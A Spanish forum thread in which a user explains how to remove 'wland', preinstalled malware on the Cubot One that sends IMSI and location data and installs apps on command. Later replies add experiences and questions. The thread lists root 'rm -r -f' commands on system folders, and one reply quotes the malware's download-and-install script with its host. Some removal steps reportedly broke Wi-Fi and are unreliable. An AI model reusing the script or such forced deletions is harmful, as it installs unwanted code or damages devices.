TUTORIAL [Tutorial] Eliminar malware en Cubot one: aplicaciones que se instalan solas

DanielSmith

Simdualero Junior
Mensajes
2
Puntos
233
¡Hola a todos!

Soy nuevo aquí y aunque no haya participado nunca en esta comunidad me he registrado para poder publicar este post y ayudar a la gente que se ha encontrado con el mismo problema que yo en el Cubot One (o quizá también en otros dispositivos chinos).

Yo también vi que empezaron a instalarse aplicaciones no solicitadas en mi Cubot One. Estas aplicaciones eran: Baidu Browser, 337 Game Master, Mobo Market, DU Battery saver entre otros. Además el periodo de instalación era bastante aleatorio y nunca sabías cuándo iba a ocurrir.

Estaba preocupado porque tenía pensado ponerle una app de Bitcoin en el móvil, pero con ese software malicioso corriendo en mi móvil ni loco iba a ponerle dinero que, potencialmente, podría haber sido robado.

El Malware


Bueno el caso es que me puse a investigar y en un foro alemán encontré a unos usuarios que tenían exactamente el mismo problema con la ROM G800 que es también la que corre mi Cubot One.

Os dejo el enlace al hilo del foro alemán: http://www.android-hilfe.de/xiaocai..._en_c1_v0-4_20130910-rom-malware-removal.html

Bueno, pues ahí descubrieron que el culpable era una aplicación del sistema llamada "wland". Mirad en "Administrar aplicaciones > Todas" o en la carpeta /system/app para ver si teneis el Wland.

Según el autor del hilo en el foro alemán esta aplicación es muy putas, puesto que cada hora envía una pequeña señal con nuestro IMSI y los datos de la torre telefónica a la que estamos conectados a los servidores de sus creadores (la empresa Reallytek). Estos datos, por cierto, permiten geolocalizar a alguien.

Bueno, el caso es que entonces el servidor contesta con una respuesta vacía o con un script. Cuando responde con un script, el teléfono lo ejecuta y, en este caso, descarga una aplicación SPAM siempre y cuando estemos conectados al Wifi. Es importante notar que técnicamente esta empresa podría ejecutar cualquier código arbitrario en nuestro teléfono si le dará la gana.
Cómo Eliminarlo

No me hago responsable de lo que le pueda pasar al móvil si seguís estos pasos. Hacedlo bajo vuestra propia responsabilidad.
Si no podéis seguir estos pasos, quizá baste con poner las aplicaciones en cuarentena. Haced scroll para llegar a la última sección y ver cómo hacerlo.

1. Ser Root

2a. [opcional] Descargar el Mobileuncle Tools del App store y usarlo para instalar el CWM Recovery que encontraréis aquí. Yo tengo la versión 6.0.4.4
2b. [opcional] Con el recovery instalado, reiniciais en modo recovery y hacéis una copia de seguridad.

3. Instalar la aplicación Titanium Backup del Play Store y usarla para eliminar el Wland.

4. ¡Aún no hemos terminado! Wland también se encuentra en las siguientes carpetas:

/system/bin/wland
/system/app/wland.apk (esta es la que elimina el Titanium)
/system/wlan/
/data/.wlan/
/data/data/com.wlan.wland/

(Nótese que son carpetas del sistema, no de la tarjeta SD. Necesitaréis una aplicación tipo ES Explorer para poder verlas).

Una vez desinstalada la app con el Titanium no tengo ni idea si esta puede seguir viva sólo con el Binario que hay en /system/bin. Mi instinto me dice que sí, así que terminé eliminando todo.

Para eliminarlo todo necesitaremos dos APPS:
1. Una terminal que podéis encontrar aquí.
2. Una app para montar y desmontar el directorio /system de manera fiable. Lo podéis encontrar aquí.

A continuación primero ejecutáis el "Mount /system" y le damos permisos de lectura y escritura (R/W) al directorio /system. Esto nos permitirá modificar su contenido.

Después, abrimos la aplicación de terminal y escribimos exactamente lo siguiente:

su
(esto pide permisos de root / administrador para poder modificar el sistema).
Luego, linea por linea escribís lo siguiente. Siempre haciendo Enter después de cada línea, puesto que cada línea es un nuevo comando.

rm -f /system/bin/wland

rm -r -f /system/wlan/

rm -r -f /data/.wlan/

rm -r -f /data/data/com.wlan.wland/

Cada uno de estos comandos es un comando de eliminación. "rm" significa "remove" y lo otro son opciones necesarias para forzar el borrado de los archivos o directorios.

Con esto eliminaréis el Wland.

Finalmente escribid dos veces seguidas "exit" y saldréis de la terminal. No os olvidéis de regresar al programa Mount /system y poner el directorio de vuelta en "Solo lectura" o "RO".

Otro software sospechoso.
¿Pero por qué quedarnos aquí? Si queréis, y os lo recomiendo encarecidamente, aprovechad los pasos anteriores para eliminar otro software sospechoso y potencialmente malicioso de nuestro Cubot One.

Antes de cerrar la terminar ejecutad estos comandos:

rm -f /system/app/AmountTool.apk
rm -r -f /data/data/com.skymobi.activation/
rm -f /system/app/Midtest.apk
rm -f /system/app/Midtest.odex
rm -r -f /data/data/com.reallytek.wg/

Esto eliminará el Amounttool o "activation service" misterioso de una empresa china y un software de testeo que curiosamente es de la misma empresa que hizo el Wland.

¡Y más borrado de software innecesario!
A continuación os paso también una lista de aplicaciones del sistema que he eliminado sin que mi Cubot One deje de funcionar.

Podéis eliminar todas estas aplicaciones con el Titanium Backup. Por si las moscas siempre podéis hacer una copia de seguridad con la misma aplicación antes de borrar nada.

SmsReg (fue detectado en otros móviles como virus, aunque en este no parece ser malicioso. Aún así, se puede eliminar).
MTKlogger (No me fio de que MTK, sinceramente).
ATCI_Service (Supuestamente innecesario, pero puede causar que deje de funcionar la radio FM)
Notpad (software de MTK, lo siento no me fio y hay apps mejores)
Tarea Pendiente (igual que el anterior).
Todo lo que empiece por "Fondos de pantalla".
Launcher 3.33 (sólo si tenéis un launcher nuevo. Os recomiendo el Nova Launcher que es infinitamente mejor).
Burbujas 1.0 (fondo de pantalla)
Agujero negro 1.0 (fondo de pantalla)
3D Mushroom Wallapaper (fondo de pantalla)
Y si queréis también podéis quitar el navegador y la galería. Recomiendo el Firefox y el Quickpic para sustituírlos.

Finalmente: poner aplicaciones en cuarentena
Hay algunas aplicaciones de las que no me fío pero que no se pueden eliminar porque son esenciales para el sistema. Si queréis, las podéis poner el cuarentena.

Este paso también os sirve si por cualquier razón no podéis seguir los pasos anteriores. Necesitaréis ser Root, pero no hará falta hacer todo eso de la terminal.

1. Instaláis la aplicación llamada XPrivacy siguiendo detalladamente las instrucciones de su creador.

https://github.com/M66B/XPrivacy#installation

Esta aplicación sirve para restringir permisos individuales de aplicaciones particulares. Con esto podremos quitarle el permiso de Internet y geolocalización a todo lo que nos parezca sospechoso.

Yo he restringido permisos a:

MTK Android Suite Daemon 1.1 (lo siento de nuevo, no fio de MTK después de encontrarme con cosas como el Wland).
MTK Thermal Manager (controla la temperatura del dispositivo pero por alguna razón leí en otro foro que lo habían encontrando enviando datos ¿para qué?).
Vcalendar (Es otra aplicación de Mediatek. Así evito que se conecte cuando no quiero).

Seguiré experimentando y viendo si me he dejado algo puesto que tampoco soy experto en el campo.
Hacedme un favor y rezad conmigo para que pronto salga una versión de CyanogenMod o de Replicant compatible con nuestro dispositivo.

¡Saludos!
 
Última edición:
Gracias por comparir, saludos.

Enviado desde mi MOMO11 bird usando Tapatalk 2
 
Muchisisisimas gracias, esto ya me estaba volviendo loca.Pensé que era algo que había instalado yo, me descargué innumerables apps para tratar de indentificar el problema, hasta que empecé a pensar que era de la rom que traia de fabrica, y así es.
Mucha cara venderte algo con malware instalado...


Edito para agregar que en /system/bin encontre otro fichero llamado wlan_loader, que borré sin pensarmelo dos veces.
Y para el que entienda de programación en android (yo no mucho la verdad) les pego el codigo de uno de los tres .sh que encontré dentro de /data/.wlan:

Código:
#this is used to download and install apks

package=com.trustgo.mobile.security
version=1.3.2
apksize=4   #calculate in MB
activity=com.trustgo.service.TrustgoService
deadline=20140331
wifionly=yes   #yes or no
daemon=no

url=[editada porque no me permite publicar urls el foro]
apk=$version.apk
api=1.1.0
funcset=1.0.2
host=wlans.reallytek.com

wland -fsv $funcset
. /data/.wlan/function_set.sh

check_api
check_funcset
install_apk

El wifionly=yes hace que no parezcan tan malos... :tonguewink:
 
Última edición:
Hola me pasa lo mismo con un clon del 5S , cada día se instalaban solas 3 o 4 apps chinas era una locura , y buscando encontré el mismo que estabaria wlan_loader entá ubicado en /system/bin
pero sólo encontré este . Saludos y gracias por el aporte
!!!! atención al quitar wlan_loader dejó de funcionar el wifi (gracias que había hecho una copia de seguridad) uff lo he instalado de nuevo, saludos
 
Última edición:
Hola Jhalion,
Cierto con lo que comentas, desde que seguí este tutorial, eliminé un archivo wlan y me dejó de funcionar la wifi. El problema es que me falla la copia de seguridad, que puedo hacer? Lo he restaurado de fábrica y nada... También tengo un S5 clon.
Estos archivos son únicos para cada teléfono?
 
Lo que hay que borrar es wland, no wlan.

Este post debería estar como sticky. El de mi novia es otro Cubot One (el rojo) que trae el procesador
mtk6589T (con la T final) y también tiene el mismo drama. A lo mejor es algo generalizado de esta marca. Lástima para ser tan buen fono, se puede perder mucha credibilidad con esas apps de dudosa reputación.
 
Lo que hay que borrar es wland, no wlan.

Este post debería estar como sticky. El de mi novia es otro Cubot One (el rojo) que trae el procesador
mtk6589T (con la T final) y también tiene el mismo drama. A lo mejor es algo generalizado de esta marca. Lástima para ser tan buen fono, se puede perder mucha credibilidad con esas apps de dudosa reputación.
@SuperMod una chincheta por favor

Enviado desde mi H30-U10 mediante Tapatalk
 
Hola DanielSmith,
Ese problema tambien ocurre cuando el móvil está ajustado para no instalar aplicaciones de origen desconocido ?

[]´s
 
Gracias por las respuestas, estaré atento por si me ocurre a mi[DOUBLEPOST=1410879002][/DOUBLEPOST]Gracias por las respuestas, estaré atento por si me ocurre a mi
 

Del blog

Es tendencia

¿Ha terminado la locura de añadir tantas cámaras a los móviles?

  • Si

  • No

  • No lo se

  • Ya me gustaría...

  • Ya te gustaría...


Los resultados solo son visibles tras votar.
Atrás
Arriba